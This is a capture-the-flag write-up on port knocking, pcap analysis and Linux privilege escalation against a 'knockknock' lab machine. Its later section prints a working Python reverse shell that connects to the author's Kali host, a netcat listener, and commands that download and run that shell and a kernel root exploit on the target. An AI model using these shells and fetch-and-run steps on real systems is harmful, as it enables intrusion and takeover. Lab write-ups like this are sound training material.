Introduction
This machine, according to its documentation, is meant to improve knowledge about port knocking, pcap analysis and basic linux exploitation.
Port Knocking
Port knocking is a technique used to open ports on a firewall by generating connection attempts on a single or on a specific sequence or ports. If the correct sequence/port is probed, the firewall will open the actual port for the host which attempted the connections.
Enumerating
The first thing that needs to be done is, as always, is enumerating the machine.
# nmap -sV -sS 10.0.0.78
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 18:27 EET
Nmap scan report for 10.0.0.78
Host is up (0.057s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
Apache is running on port 80, curl-ing on the port we get:
# curl 10.0.0.78
<html>
<h1>huhuhuh Hey Beavis... huhuhh Check it out!</h1>
<br>
<a href="pcap1.pcap">Wooah</a>
</html>
This is the first pcap file, so let’s download it.
wget 10.0.0.78/pcap1.pcap
I then used Wireshark to analyze it.
Since the machine is about port knocking, let’s focus primarily on TCP connections. Twice we can see that there are three sequences of TCP SYN packets to port 7000, 8000 and 9000 respectively. Probably this is the sequence to use to open some other port.
In order to do the knocking, it is possible to use telnet or to use a custom program such as this simple Python tool.
# telnet 10.0.0.78 7000
Trying 10.0.0.78...
telnet: Unable to connect to remote host: Connection refused
root@kali:~/CTF/tryhackme/knockknock# telnet 10.0.0.78 8000
Trying 10.0.0.78...
telnet: Unable to connect to remote host: Connection refused
root@kali:~/CTF/tryhackme/knockknock# telnet 10.0.0.78 9000
Trying 10.0.0.78...
telnet: Unable to connect to remote host: Connection refused
root@kali:~/CTF/tryhackme/knockknock# nmap -sV -sS 10.0.0.78 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 18:40 EET
Nmap scan report for 10.0.0.78
Host is up (0.063s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
8888/tcp open tcpwrapped
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.17 seconds
Ok, now we see that port 8888 is open. In fact, looking at the pcap file, we can see that after the second port knocking, there is a TCP connection to port 8888.
# telnet 10.0.0.78 8888
Trying 10.0.0.78...
Connected to 10.0.0.78.
Escape character is '^]'.
/burgerworld/
Connection closed by foreign host.
Connecting to this port we found what looks like a web path. So let’s use curl again to explore it.
# curl 10.0.0.78/burgerworld/
<html>
<h1>heheheh..Hey Hows It Going..heheh..</h1>
<br>
<a href="pcap2.pcap">heheh...hehh..</a>
</html>
Another pcap file to download and analyze. This time there are no obvious sequences of TCP connection that might be another port knocking configuration. Following the TCP streams though, and in particular the last part of the pcap, we can find a ‘hidden’ message.
It is not needed to speak german to understand that eins drei and seiben are one, three and seven respectively. Let’s knock on these ports then and see what happens.
# python3 knock.py 10.0.0.78 1 3 3 7
root@kali:~/CTF/tryhackme/knockknock# nmap -sV -sS 10.0.0.78 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 19:02 EET
Nmap scan report for 10.0.0.78
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1337/tcp open waste?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.70%I=7%D=2/16%Time=5C684247%P=x86_64-pc-linux-gnu%r(NU
SF:LL,F,"/iamcornholio/\n")%r(GenericLines,F,"/iamcornholio/\n")%r(GetRequ
SF:est,F,"/iamcornholio/\n")%r(HTTPOptions,F,"/iamcornholio/\n")%r(RTSPReq
SF:uest,F,"/iamcornholio/\n")%r(RPCCheck,F,"/iamcornholio/\n")%r(DNSVersio
SF:nBindReqTCP,F,"/iamcornholio/\n")%r(DNSStatusRequestTCP,F,"/iamcornholi
SF:o/\n")%r(Help,F,"/iamcornholio/\n")%r(SSLSessionReq,F,"/iamcornholio/\n
SF:")%r(TLSSessionReq,F,"/iamcornholio/\n")%r(Kerberos,F,"/iamcornholio/\n
SF:")%r(SMBProgNeg,F,"/iamcornholio/\n")%r(X11Probe,F,"/iamcornholio/\n")%
SF:r(FourOhFourRequest,F,"/iamcornholio/\n")%r(LPDString,F,"/iamcornholio/
SF:\n")%r(LDAPSearchReq,F,"/iamcornholio/\n")%r(LDAPBindReq,F,"/iamcornhol
SF:io/\n")%r(SIPOptions,F,"/iamcornholio/\n")%r(LANDesk-RC,F,"/iamcornholi
SF:o/\n")%r(TerminalServer,F,"/iamcornholio/\n")%r(NCP,F,"/iamcornholio/\n
SF:")%r(NotesRPC,F,"/iamcornholio/\n")%r(JavaRMI,F,"/iamcornholio/\n")%r(W
SF:MSRequest,F,"/iamcornholio/\n")%r(oracle-tns,F,"/iamcornholio/\n")%r(ms
SF:-sql-s,F,"/iamcornholio/\n")%r(afp,F,"/iamcornholio/\n")%r(giop,F,"/iam
SF:cornholio/\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.46 seconds
Ok, after knocking on ports 1 3 3 and 7, we can see port 1337 open. We don’t need more than nmap’s own fingerprint to see another web directory: iamcornholio.
# curl 10.0.0.78/iamcornholio/
<html>
<h1>huhhuhhh...Hey Beavis...Im all about uhhh...huhuh...that base huhhuhhh...</h1>
T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK
</html>
This looks clearly like a base64 encoded string, so let’s decode it.
# echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
Open up SSH: 8888 9999 7777 6666
Ok, seems like this will be the last knocking, to open SSH.
# python3 knock.py 10.0.0.78 8888 9999 7777 6666
root@kali:~/CTF/tryhackme/knockknock# ssh 10.0.0.78
The authenticity of host '10.0.0.78 (10.0.0.78)' can't be established.
ECDSA key fingerprint is SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.78' (ECDSA) to the list of known hosts.
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
root@10.0.0.78's password:
SSH banner presents us with some credentials to use, so let’s try to SSH with those.
# ssh butthead@10.0.0.78
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
butthead@10.0.0.78's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Tue Mar 3 01:02:49 2015 from 192.168.56.102
You are only logging in for a split second! What do you do!
Connection to 10.0.0.78 closed.
The connection closes right away, so we do not have time to run any command, but we can use ssh to run commands one by one.
# ssh butthead@10.0.0.78 pwd
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
butthead@10.0.0.78's password:
/home/butthead
root@kali:~/CTF/tryhackme/knockknock# ssh butthead@10.0.0.78 ls -l /home/butthead/
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
butthead@10.0.0.78's password:
total 4
-rw-rw-r-- 1 butthead butthead 67 Mar 3 2015 nachos
# ssh butthead@10.0.0.78 cat nachos
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead #
# PASSWORD: nachosrule #
############################################
butthead@10.0.0.78's password:
Great job on getting this far.
Can you login as beavis or root ?
So, there is a file ‘nachos’ inside the home directory of the butthead user which challenges us to login as root. At this point it is more convenient to get a proper shell. In order to do this, let’s host on the kali VM we are using a file called shell.py, a simple reverse shell in Python with hardcoded connection parameters.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.8.0.108",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
In this case 10.8.0.108 is the address of my Kali VM. From here, let’s use netcat to listen to incoming connections.
nc -lvp 4444
Let’s now get the file on the target machine and let’s execute it with:
ssh butthead@10.0.0.78 wget 10.8.0.108/shell.py && python shell.py
At this point a simple shell is spawned and we can run commands more conveniently from our Kali VM. uname -a tells us that the target machine is running Linux 3.13. A quick search on ExploitDB points us to an exploit to elevate privileges.
Let’s put the C code for the exploit in a file that we will again serve from the Kali machine. After this is done, we need to download the file, compile it and run it.
wget 10.8.0.108/osf.c
gcc osf.c -o osf
./osf
[...]
# whoami
root
We got root, so to conclude this machine, we check as usual in /root where we finally find
# ls -la /root
total 28
drwx------ 3 root root 4096 Mar 3 2015 .
drwxr-xr-x 21 root root 4096 Mar 2 2015 ..
drwx------ 2 root root 4096 Mar 2 2015 .aptitude
-rw------- 1 root root 370 Mar 3 2015 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 202 Mar 3 2015 SECRETZ
# ls -la /root/SECRETZ
-rw-r--r-- 1 root root 202 Mar 3 2015 /root/SECRETZ
# cat /root/SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
admin@top-hat-sec.com
Now we can consider this machine pwned.
For any correction, feedback or question feel free to drop a mail to security[at]coolbyte[dot]eu.